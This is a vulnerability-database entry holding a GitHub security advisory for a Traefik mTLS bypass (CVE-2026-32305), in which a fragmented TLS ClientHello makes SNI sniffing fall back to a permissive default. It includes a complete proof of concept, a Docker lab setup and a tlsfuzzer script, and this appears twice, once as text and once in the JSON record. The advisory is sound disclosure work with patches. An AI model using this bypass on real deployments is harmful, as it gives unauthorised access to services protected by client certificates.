CWE-287
DiscouragedImproper Authentication
Abstraction: Class · Status: Draft
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.
5964 vulnerabilities reference this CWE, most recent first.
GHSA-WVVQ-WGCR-9Q48
Vulnerability from github – Published: 2026-03-20 15:43 – Updated: 2026-03-20 15:43Summary
There is a potential vulnerability in Traefik's TLS SNI pre-sniffing logic related to fragmented ClientHello packets.
When a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication.
Patches
- https://github.com/traefik/traefik/releases/tag/v2.11.41
- https://github.com/traefik/traefik/releases/tag/v3.6.11
- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2
For more information
If you have any questions or comments about this advisory, please open an issue.
Original Description ### Summary I found a behavior in Traefik's latest version where fragmented ClientHello packets can cause pre-sniff SNI extraction to not find the sni (EOF during sniff), which makes the TCP router fall back to default routing TLS config. If the default TLS config does not require client certificates (which is NoClientCert by default), the handshake succeeds without client auth, and the request is later routed to the HTTP Host which should be the protected with client certificate authentication (RequireAndVerifyClientCert tls config). ### Details The vulnerability is caused by a mismatch between where Traefik decides the TLS policy per host and where Go TLS can finally parse the full ClientHello. 1. In router.go, ServeTCP function calls clientHelloInfo. 2. clientHelloInfo peeks only one TLS record length (recLen) and then peeks exactly 5 + recLen bytes. It runs a temporary TLS parse on those bytes to extract the SNI. If ClientHello is fragmented, pre-sniff may return empty SNI (With fragmentation, first record can be incomplete for full ClientHello parsing). 4. clientHelloInfo still returns isTLS=true and empty SNI (it thinks there is no sni so it applies the default tls config (Which is by default NoClientCert which is permissive) 5. Real Go TLS handshake succeeds later without requiring the client cert. 6. Request is routed to the host that should have been protected. Conditions required for impact: - Route-level TLS options enforce mTLS for a host. - Default TLS config is weaker (noClientCert, which is the default default). - Pre-sniff fails to extract SNI (due to fragmented ClientHello). A workaround for this is to set the default tls config to RequireAndVerifyClientCert (but then you need to explicitly define for each permissive host the NoClientCert TLS config). A suggestion to fix is to parse the complete ClientHello before tls config decision (handle multi-record fragmentation). ### PoC# prerequisites (ubuntu/debian, in rhel/fedora you need to run only the install command (dnf) but with "docker" instead of docker.io and podman will emulate it)
sudo apt update
sudo apt install -y docker.io openssl git python3 python3-venv
sudo usermod -aG docker "$USER"
# in debian/ubuntu run newgrp docker to apply the new group to the user
mkdir -p /tmp/traefik-frag-poc/{certs,config/dynamic}
cd /tmp/traefik-frag-poc
# CA
openssl genrsa -out certs/ca.key 4096
openssl req -x509 -new -nodes -key certs/ca.key -sha256 -days 3650 \
-subj "/CN=PoC-CA" -out certs/ca.crt
# Server cert (whoami.home.arpa)
cat > certs/server.cnf <<'EOF_SERVER_CNF'
[req]
distinguished_name = dn
req_extensions = v3_req
prompt = no
[dn]
CN = whoami.home.arpa
[v3_req]
subjectAltName = @alt_names
[alt_names]
DNS.1 = whoami.home.arpa
EOF_SERVER_CNF
openssl genrsa -out certs/traefik.key 2048
openssl req -new -key certs/traefik.key -out certs/traefik.csr -config certs/server.cnf
openssl x509 -req -in certs/traefik.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \
-out certs/traefik.crt -days 365 -sha256 -extensions v3_req -extfile certs/server.cnf
# Client cert (valid client)
openssl genrsa -out certs/client.key 2048
openssl req -new -key certs/client.key -subj "/CN=client1" -out certs/client.csr
openssl x509 -req -in certs/client.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \
-out certs/client.crt -days 365 -sha256
cat > config/traefik.yml <<'EOF_TRAEFIK_CFG'
entryPoints:
websecure:
address: ":8443"
providers:
file:
directory: /etc/traefik/dynamic
watch: true
log:
level: DEBUG
EOF_TRAEFIK_CFG
cat > config/dynamic/dynamic.yml <<'EOF_DYNAMIC_CFG'
http:
routers:
whoami:
rule: "Host(`whoami.home.arpa`)"
entryPoints:
- websecure
service: whoami
tls:
options: mtls
services:
whoami:
loadBalancer:
servers:
- url: "http://whoami:80"
tls:
certificates:
- certFile: /certs/traefik.crt
keyFile: /certs/traefik.key
options:
mtls:
clientAuth:
caFiles:
- /certs/ca.crt
clientAuthType: RequireAndVerifyClientCert
EOF_DYNAMIC_CFG
docker network create traefik-poc
# run a whoami microservice for the bypass demonstration
docker run -d \
--name whoami \
--network traefik-poc \
--restart unless-stopped \
traefik/whoami:v1.11.0
docker run -d \
--name traefik \
--network traefik-poc \
-p 8443:8443 \
--restart unless-stopped \
-v "$PWD/config/traefik.yml:/etc/traefik/traefik.yml:ro,Z" \
-v "$PWD/config/dynamic:/etc/traefik/dynamic:ro,Z" \
-v "$PWD/certs:/certs:ro,Z" \
traefik:3.6.10 \
--configFile=/etc/traefik/traefik.yml
# watch traefik logs to ensure everything was deployed correctly
docker logs traefik
# tlsfuzzer setup + frag client script
mkdir -p /tmp/testtlsfuzz
cd /tmp/testtlsfuzz
git clone https://github.com/tlsfuzzer/tlsfuzzer.git
cd tlsfuzzer
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
cat > frag_clienthello.py <<'EOF_FRAG_SCRIPT'
import argparse
import sys
import os
from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import (
Connect,
SetMaxRecordSize,
ClientHelloGenerator,
CertificateGenerator,
CertificateVerifyGenerator,
ClientKeyExchangeGenerator,
ChangeCipherSpecGenerator,
FinishedGenerator,
ApplicationDataGenerator,
AlertGenerator,
)
from tlsfuzzer.expect import (
ExpectServerHello,
ExpectCertificate,
ExpectServerKeyExchange,
ExpectCertificateRequest,
ExpectServerHelloDone,
ExpectChangeCipherSpec,
ExpectFinished,
ExpectApplicationData,
ExpectAlert,
ExpectClose,
)
from tlsfuzzer.helpers import SIG_ALL
from tlslite.constants import (
CipherSuite,
ExtensionType,
AlertLevel,
AlertDescription,
GroupName,
)
from tlslite.extensions import (
SNIExtension,
TLSExtension,
SupportedGroupsExtension,
SignatureAlgorithmsExtension,
SignatureAlgorithmsCertExtension,
)
from tlslite.utils.keyfactory import parsePEMKey
from tlslite.x509 import X509
from tlslite.x509certchain import X509CertChain
class PrettyExpectApplicationData(ExpectApplicationData):
def process(self, state, msg):
super().process(state, msg)
text = msg.write().decode("utf-8", errors="replace")
head, _, body = text.partition("\r\n\r\n")
print("\n=== HTTP RESPONSE ===")
print(head)
print()
print(body)
print("=== END HTTP RESPONSE ===\n")
def load_client_cert_and_key(cert_path, key_path):
cert = None
key = None
if cert_path:
text_cert = open(cert_path, "rb").read()
if sys.version_info[0] >= 3:
text_cert = str(text_cert, "utf-8")
cert = X509()
cert.parse(text_cert)
if key_path:
text_key = open(key_path, "rb").read()
if sys.version_info[0] >= 3:
text_key = str(text_key, "utf-8")
key = parsePEMKey(text_key, private=True)
return cert, key
def main():
p = argparse.ArgumentParser()
p.add_argument("--connect-host", default="127.0.0.1")
p.add_argument("--port", type=int, default=8443)
p.add_argument("--sni", default="whoami.home.arpa")
p.add_argument("--record-size", type=int, default=512)
p.add_argument("--padding-len", type=int, default=1200)
p.add_argument("--expect-cert-request", action="store_true")
p.add_argument("--client-cert-pem", default="")
p.add_argument("--client-key-pem", default="")
args = p.parse_args()
cert, key = load_client_cert_and_key(args.client_cert_pem, args.client_key_pem)
print(f"[DBG] cert_arg={args.client_cert_pem!r} key_arg={args.client_key_pem!r}")
for p in [args.client_cert_pem, args.client_key_pem]:
if p:
print(f"[DBG] file={p} exists={os.path.exists(p)} size={os.path.getsize(p) if os.path.exists(p) else -1}")
print(f"[DBG] cert_loaded={cert is not None} key_loaded={key is not None}")
print(f"[DBG] bool(cert)={bool(cert) if cert is not None else None} bool(key)={bool(key) if key is not None else None}")
if (args.client_cert_pem or args.client_key_pem) and not (cert and key):
raise ValueError("Provide both --client-cert-pem and --client-key-pem")
conv = Connect(args.connect_host, args.port)
node = conv
node = node.add_child(SetMaxRecordSize(args.record_size))
ext = {
ExtensionType.server_name: SNIExtension().create(bytearray(args.sni, "ascii")),
ExtensionType.supported_groups: SupportedGroupsExtension().create(
[GroupName.secp256r1, GroupName.ffdhe2048]
),
ExtensionType.signature_algorithms: SignatureAlgorithmsExtension().create(SIG_ALL),
ExtensionType.signature_algorithms_cert: SignatureAlgorithmsCertExtension().create(SIG_ALL),
21: TLSExtension().create(21, bytearray(args.padding_len)),
}
ciphers = [
CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,
CipherSuite.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,
CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV,
]
node = node.add_child(ClientHelloGenerator(ciphers, extensions=ext))
node = node.add_child(ExpectServerHello())
node = node.add_child(ExpectCertificate())
node = node.add_child(ExpectServerKeyExchange())
if args.expect_cert_request:
node = node.add_child(ExpectCertificateRequest())
node = node.add_child(ExpectServerHelloDone())
if args.expect_cert_request and cert and key:
node = node.add_child(CertificateGenerator(X509CertChain([cert])))
node = node.add_child(ClientKeyExchangeGenerator())
node = node.add_child(CertificateVerifyGenerator(key))
node = node.add_child(ChangeCipherSpecGenerator())
node = node.add_child(FinishedGenerator())
node = node.add_child(ExpectChangeCipherSpec())
node = node.add_child(ExpectFinished())
req = bytearray(
f"GET / HTTP/1.1\r\nHost: {args.sni}\r\nConnection: close\r\n\r\n".encode("ascii")
)
node = node.add_child(ApplicationDataGenerator(req))
node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))
node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))
node = node.add_child(ExpectAlert())
node.next_sibling = ExpectClose()
elif args.expect_cert_request and not (cert and key):
node = node.add_child(CertificateGenerator())
node = node.add_child(ClientKeyExchangeGenerator())
node = node.add_child(ChangeCipherSpecGenerator())
node = node.add_child(FinishedGenerator())
node = node.add_child(ExpectChangeCipherSpec())
node = node.add_child(ExpectFinished())
else:
node = node.add_child(ClientKeyExchangeGenerator())
node = node.add_child(ChangeCipherSpecGenerator())
node = node.add_child(FinishedGenerator())
node = node.add_child(ExpectChangeCipherSpec())
node = node.add_child(ExpectFinished())
req = bytearray(
f"GET / HTTP/1.1\r\nHost: {args.sni}\r\nConnection: close\r\n\r\n".encode("ascii")
)
node = node.add_child(ApplicationDataGenerator(req))
node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))
node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))
node = node.add_child(ExpectAlert())
node.next_sibling = ExpectClose()
try:
Runner(conv).run()
print("[OK] conversation completed")
except AssertionError as e:
print(f"[TLS RAW ERROR] {e}")
marker = "Unexpected message from peer: "
s = str(e)
if marker in s:
print(f"[TLS PEER MESSAGE] {s.split(marker, 1)[1].strip()}")
raise
if __name__ == "__main__":
main()
EOF_FRAG_SCRIPT
chmod +x frag_clienthello.py
cd /tmp/testtlsfuzz/tlsfuzzer
source .venv/bin/activate
# case 1: non fragmented, no client cert (strict mTLS path, should fail. traefik logs should inform that client didn't provide a certificate)
python frag_clienthello.py \
--connect-host 127.0.0.1 \
--port 8443 \
--sni whoami.home.arpa \
--record-size 16384 \
--expect-cert-request
# case 1b with openssl instead of my script
printf 'GET / HTTP/1.1\r\nHost: whoami.home.arpa\r\nConnection: close\r\n\r\n' | \
openssl s_client \
-connect 127.0.0.1:8443 \
-servername whoami.home.arpa \
-tls1_2 \
-CAfile /tmp/traefik-frag-poc/certs/ca.crt \
-state -msg -tlsextdebug -verify_return_error
# case 2: non fragmented, with valid client cert (should succeed)
python frag_clienthello.py \
--connect-host 127.0.0.1 \
--port 8443 \
--sni whoami.home.arpa \
--record-size 16384 \
--expect-cert-request \
--client-cert-pem /tmp/traefik-frag-poc/certs/client.crt \
--client-key-pem /tmp/traefik-frag-poc/certs/client.key
# case 2b with openssl instead of my script
printf 'GET / HTTP/1.1\r\nHost: whoami.home.arpa\r\nConnection: close\r\n\r\n' | \
openssl s_client -connect 127.0.0.1:8443 -servername whoami.home.arpa -tls1_2 \
-cert /tmp/traefik-frag-poc/certs/client.crt \
-key /tmp/traefik-frag-poc/certs/client.key \
-CAfile /tmp/traefik-frag-poc/certs/ca.crt -quiet
# case 3 fragmented ClientHello, no client cert (bypass behavior test)
python frag_clienthello.py \
--connect-host 127.0.0.1 \
--port 8443 \
--sni whoami.home.arpa \
--record-size 500
# in the record-size you can play with it as long as the client hello sni sniff function returns an EOF
### Impact
An attacker can bypass route-level mTLS enforcement by fragmenting ClientHello so Traefik pre-sniff fails (EOF) and falls back to default permissive TLS config.
--
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.7.0-ea.1"
},
{
"fixed": "3.7.0-ea.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.6.10"
},
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v3"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.11.40"
},
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.11.41"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/traefik/traefik"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.7.34"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32305"
],
"database_specific": {
"cwe_ids": [
"CWE-287"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T15:43:01Z",
"nvd_published_at": "2026-03-20T11:18:02Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThere is a potential vulnerability in Traefik\u0027s TLS SNI pre-sniffing logic related to fragmented ClientHello packets.\n\nWhen a TLS ClientHello is fragmented across multiple records, Traefik\u0027s SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n### Summary\nI found a behavior in Traefik\u0027s latest version where fragmented ClientHello packets can cause pre-sniff SNI extraction to not find the sni (EOF during sniff), which makes the TCP router fall back to default routing TLS config.\n\nIf the default TLS config does not require client certificates (which is NoClientCert by default), the handshake succeeds without client auth, and the request is later routed to the HTTP Host which should be the protected with client certificate authentication (RequireAndVerifyClientCert tls config).\n\n### Details\nThe vulnerability is caused by a mismatch between where Traefik decides the TLS policy per host and where Go TLS can finally parse the full ClientHello.\n\n1. In router.go, ServeTCP function calls clientHelloInfo.\n2. clientHelloInfo peeks only one TLS record length (recLen) and then peeks exactly 5 + recLen bytes.\nIt runs a temporary TLS parse on those bytes to extract the SNI.\nIf ClientHello is fragmented, pre-sniff may return empty SNI (With fragmentation, first record can be incomplete for full ClientHello parsing).\n4. clientHelloInfo still returns isTLS=true and empty SNI (it thinks there is no sni so it applies the default tls config (Which is by default NoClientCert which is permissive)\n5. Real Go TLS handshake succeeds later without requiring the client cert.\n6. Request is routed to the host that should have been protected.\n\nConditions required for impact:\n- Route-level TLS options enforce mTLS for a host.\n- Default TLS config is weaker (noClientCert, which is the default default).\n- Pre-sniff fails to extract SNI (due to fragmented ClientHello).\n\nA workaround for this is to set the default tls config to RequireAndVerifyClientCert (but then you need to explicitly define for each permissive host the NoClientCert TLS config).\n\nA suggestion to fix is to parse the complete ClientHello before tls config decision (handle multi-record fragmentation).\n\n### PoC\n```python\n# prerequisites (ubuntu/debian, in rhel/fedora you need to run only the install command (dnf) but with \"docker\" instead of docker.io and podman will emulate it)\nsudo apt update\nsudo apt install -y docker.io openssl git python3 python3-venv\nsudo usermod -aG docker \"$USER\"\n# in debian/ubuntu run newgrp docker to apply the new group to the user\n\nmkdir -p /tmp/traefik-frag-poc/{certs,config/dynamic}\ncd /tmp/traefik-frag-poc\n\n# CA\nopenssl genrsa -out certs/ca.key 4096\nopenssl req -x509 -new -nodes -key certs/ca.key -sha256 -days 3650 \\\n -subj \"/CN=PoC-CA\" -out certs/ca.crt\n\n# Server cert (whoami.home.arpa)\ncat \u003e certs/server.cnf \u003c\u003c\u0027EOF_SERVER_CNF\u0027\n[req]\ndistinguished_name = dn\nreq_extensions = v3_req\nprompt = no\n\n[dn]\nCN = whoami.home.arpa\n\n[v3_req]\nsubjectAltName = @alt_names\n\n[alt_names]\nDNS.1 = whoami.home.arpa\nEOF_SERVER_CNF\n\nopenssl genrsa -out certs/traefik.key 2048\nopenssl req -new -key certs/traefik.key -out certs/traefik.csr -config certs/server.cnf\nopenssl x509 -req -in certs/traefik.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n -out certs/traefik.crt -days 365 -sha256 -extensions v3_req -extfile certs/server.cnf\n\n# Client cert (valid client)\nopenssl genrsa -out certs/client.key 2048\nopenssl req -new -key certs/client.key -subj \"/CN=client1\" -out certs/client.csr\nopenssl x509 -req -in certs/client.csr -CA certs/ca.crt -CAkey certs/ca.key -CAcreateserial \\\n -out certs/client.crt -days 365 -sha256\n\ncat \u003e config/traefik.yml \u003c\u003c\u0027EOF_TRAEFIK_CFG\u0027\nentryPoints:\n websecure:\n address: \":8443\"\n\nproviders:\n file:\n directory: /etc/traefik/dynamic\n watch: true\n\nlog:\n level: DEBUG\nEOF_TRAEFIK_CFG\n\ncat \u003e config/dynamic/dynamic.yml \u003c\u003c\u0027EOF_DYNAMIC_CFG\u0027\nhttp:\n routers:\n whoami:\n rule: \"Host(`whoami.home.arpa`)\"\n entryPoints:\n - websecure\n service: whoami\n tls:\n options: mtls\n\n services:\n whoami:\n loadBalancer:\n servers:\n - url: \"http://whoami:80\"\n\ntls:\n certificates:\n - certFile: /certs/traefik.crt\n keyFile: /certs/traefik.key\n\n options:\n mtls:\n clientAuth:\n caFiles:\n - /certs/ca.crt\n clientAuthType: RequireAndVerifyClientCert\nEOF_DYNAMIC_CFG\n\ndocker network create traefik-poc\n\n\n# run a whoami microservice for the bypass demonstration\ndocker run -d \\\n --name whoami \\\n --network traefik-poc \\\n --restart unless-stopped \\\n traefik/whoami:v1.11.0\n\ndocker run -d \\\n --name traefik \\\n --network traefik-poc \\\n -p 8443:8443 \\\n --restart unless-stopped \\\n -v \"$PWD/config/traefik.yml:/etc/traefik/traefik.yml:ro,Z\" \\\n -v \"$PWD/config/dynamic:/etc/traefik/dynamic:ro,Z\" \\\n -v \"$PWD/certs:/certs:ro,Z\" \\\n traefik:3.6.10 \\\n --configFile=/etc/traefik/traefik.yml\n\n# watch traefik logs to ensure everything was deployed correctly\ndocker logs traefik\n\n# tlsfuzzer setup + frag client script\n\nmkdir -p /tmp/testtlsfuzz\ncd /tmp/testtlsfuzz\ngit clone https://github.com/tlsfuzzer/tlsfuzzer.git\ncd tlsfuzzer\n\npython3 -m venv .venv\nsource .venv/bin/activate\npip install -r requirements.txt\n\ncat \u003e frag_clienthello.py \u003c\u003c\u0027EOF_FRAG_SCRIPT\u0027\nimport argparse\nimport sys\nimport os\n\nfrom tlsfuzzer.runner import Runner\nfrom tlsfuzzer.messages import (\n Connect,\n SetMaxRecordSize,\n ClientHelloGenerator,\n CertificateGenerator,\n CertificateVerifyGenerator,\n ClientKeyExchangeGenerator,\n ChangeCipherSpecGenerator,\n FinishedGenerator,\n ApplicationDataGenerator,\n AlertGenerator,\n)\nfrom tlsfuzzer.expect import (\n ExpectServerHello,\n ExpectCertificate,\n ExpectServerKeyExchange,\n ExpectCertificateRequest,\n ExpectServerHelloDone,\n ExpectChangeCipherSpec,\n ExpectFinished,\n ExpectApplicationData,\n ExpectAlert,\n ExpectClose,\n)\nfrom tlsfuzzer.helpers import SIG_ALL\nfrom tlslite.constants import (\n CipherSuite,\n ExtensionType,\n AlertLevel,\n AlertDescription,\n GroupName,\n)\nfrom tlslite.extensions import (\n SNIExtension,\n TLSExtension,\n SupportedGroupsExtension,\n SignatureAlgorithmsExtension,\n SignatureAlgorithmsCertExtension,\n)\nfrom tlslite.utils.keyfactory import parsePEMKey\nfrom tlslite.x509 import X509\nfrom tlslite.x509certchain import X509CertChain\n\n\nclass PrettyExpectApplicationData(ExpectApplicationData):\n def process(self, state, msg):\n super().process(state, msg)\n text = msg.write().decode(\"utf-8\", errors=\"replace\")\n head, _, body = text.partition(\"\\r\\n\\r\\n\")\n print(\"\\n=== HTTP RESPONSE ===\")\n print(head)\n print()\n print(body)\n print(\"=== END HTTP RESPONSE ===\\n\")\n\n\ndef load_client_cert_and_key(cert_path, key_path):\n cert = None\n key = None\n\n if cert_path:\n text_cert = open(cert_path, \"rb\").read()\n if sys.version_info[0] \u003e= 3:\n text_cert = str(text_cert, \"utf-8\")\n cert = X509()\n cert.parse(text_cert)\n\n if key_path:\n text_key = open(key_path, \"rb\").read()\n if sys.version_info[0] \u003e= 3:\n text_key = str(text_key, \"utf-8\")\n key = parsePEMKey(text_key, private=True)\n\n return cert, key\n\n\ndef main():\n p = argparse.ArgumentParser()\n p.add_argument(\"--connect-host\", default=\"127.0.0.1\")\n p.add_argument(\"--port\", type=int, default=8443)\n p.add_argument(\"--sni\", default=\"whoami.home.arpa\")\n p.add_argument(\"--record-size\", type=int, default=512)\n p.add_argument(\"--padding-len\", type=int, default=1200)\n p.add_argument(\"--expect-cert-request\", action=\"store_true\")\n p.add_argument(\"--client-cert-pem\", default=\"\")\n p.add_argument(\"--client-key-pem\", default=\"\")\n args = p.parse_args()\n\n cert, key = load_client_cert_and_key(args.client_cert_pem, args.client_key_pem)\n\n print(f\"[DBG] cert_arg={args.client_cert_pem!r} key_arg={args.client_key_pem!r}\")\n for p in [args.client_cert_pem, args.client_key_pem]:\n if p:\n print(f\"[DBG] file={p} exists={os.path.exists(p)} size={os.path.getsize(p) if os.path.exists(p) else -1}\")\n\n print(f\"[DBG] cert_loaded={cert is not None} key_loaded={key is not None}\")\n print(f\"[DBG] bool(cert)={bool(cert) if cert is not None else None} bool(key)={bool(key) if key is not None else None}\")\n\n\n if (args.client_cert_pem or args.client_key_pem) and not (cert and key):\n raise ValueError(\"Provide both --client-cert-pem and --client-key-pem\")\n\n conv = Connect(args.connect_host, args.port)\n node = conv\n node = node.add_child(SetMaxRecordSize(args.record_size))\n\n ext = {\n ExtensionType.server_name: SNIExtension().create(bytearray(args.sni, \"ascii\")),\n ExtensionType.supported_groups: SupportedGroupsExtension().create(\n [GroupName.secp256r1, GroupName.ffdhe2048]\n ),\n ExtensionType.signature_algorithms: SignatureAlgorithmsExtension().create(SIG_ALL),\n ExtensionType.signature_algorithms_cert: SignatureAlgorithmsCertExtension().create(SIG_ALL),\n 21: TLSExtension().create(21, bytearray(args.padding_len)),\n }\n\n ciphers = [\n CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,\n CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,\n CipherSuite.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,\n CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV,\n ]\n\n node = node.add_child(ClientHelloGenerator(ciphers, extensions=ext))\n node = node.add_child(ExpectServerHello())\n node = node.add_child(ExpectCertificate())\n node = node.add_child(ExpectServerKeyExchange())\n\n if args.expect_cert_request:\n node = node.add_child(ExpectCertificateRequest())\n\n node = node.add_child(ExpectServerHelloDone())\n\n if args.expect_cert_request and cert and key:\n node = node.add_child(CertificateGenerator(X509CertChain([cert])))\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(CertificateVerifyGenerator(key))\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n req = bytearray(\n f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n )\n node = node.add_child(ApplicationDataGenerator(req))\n node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n node = node.add_child(ExpectAlert())\n node.next_sibling = ExpectClose()\n\n elif args.expect_cert_request and not (cert and key):\n node = node.add_child(CertificateGenerator())\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n\n else:\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n req = bytearray(\n f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n )\n node = node.add_child(ApplicationDataGenerator(req))\n node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n node = node.add_child(ExpectAlert())\n node.next_sibling = ExpectClose()\n\n try:\n Runner(conv).run()\n print(\"[OK] conversation completed\")\n except AssertionError as e:\n print(f\"[TLS RAW ERROR] {e}\")\n marker = \"Unexpected message from peer: \"\n s = str(e)\n if marker in s:\n print(f\"[TLS PEER MESSAGE] {s.split(marker, 1)[1].strip()}\")\n raise\n\n\nif __name__ == \"__main__\":\n main()\nEOF_FRAG_SCRIPT\n\nchmod +x frag_clienthello.py\ncd /tmp/testtlsfuzz/tlsfuzzer\nsource .venv/bin/activate\n\n# case 1: non fragmented, no client cert (strict mTLS path, should fail. traefik logs should inform that client didn\u0027t provide a certificate)\npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 16384 \\\n --expect-cert-request\n\n# case 1b with openssl instead of my script\nprintf \u0027GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n\u0027 | \\\nopenssl s_client \\\n -connect 127.0.0.1:8443 \\\n -servername whoami.home.arpa \\\n -tls1_2 \\\n -CAfile /tmp/traefik-frag-poc/certs/ca.crt \\\n -state -msg -tlsextdebug -verify_return_error\n\n\n# case 2: non fragmented, with valid client cert (should succeed) \npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 16384 \\\n --expect-cert-request \\\n --client-cert-pem /tmp/traefik-frag-poc/certs/client.crt \\\n --client-key-pem /tmp/traefik-frag-poc/certs/client.key\n\n# case 2b with openssl instead of my script\nprintf \u0027GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n\u0027 | \\\nopenssl s_client -connect 127.0.0.1:8443 -servername whoami.home.arpa -tls1_2 \\\n -cert /tmp/traefik-frag-poc/certs/client.crt \\\n -key /tmp/traefik-frag-poc/certs/client.key \\\n -CAfile /tmp/traefik-frag-poc/certs/ca.crt -quiet\n\n# case 3 fragmented ClientHello, no client cert (bypass behavior test)\npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 500\n# in the record-size you can play with it as long as the client hello sni sniff function returns an EOF\n```\n\n### Impact\nAn attacker can bypass route-level mTLS enforcement by fragmenting ClientHello so Traefik pre-sniff fails (EOF) and falls back to default permissive TLS config.\n\n\u003c/details\u003e\n\n--",
"id": "GHSA-wvvq-wgcr-9q48",
"modified": "2026-03-20T15:43:01Z",
"published": "2026-03-20T15:43:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32305"
},
{
"type": "PACKAGE",
"url": "https://github.com/traefik/traefik"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
},
{
"type": "WEB",
"url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Traefik has a Potential mTLS Bypass via Fragmented TLS ClientHello Causing Pre-SNI Sniff Fallback to Default Non-mTLS TLS Config"
}
GHSA-WVW9-V86G-F237
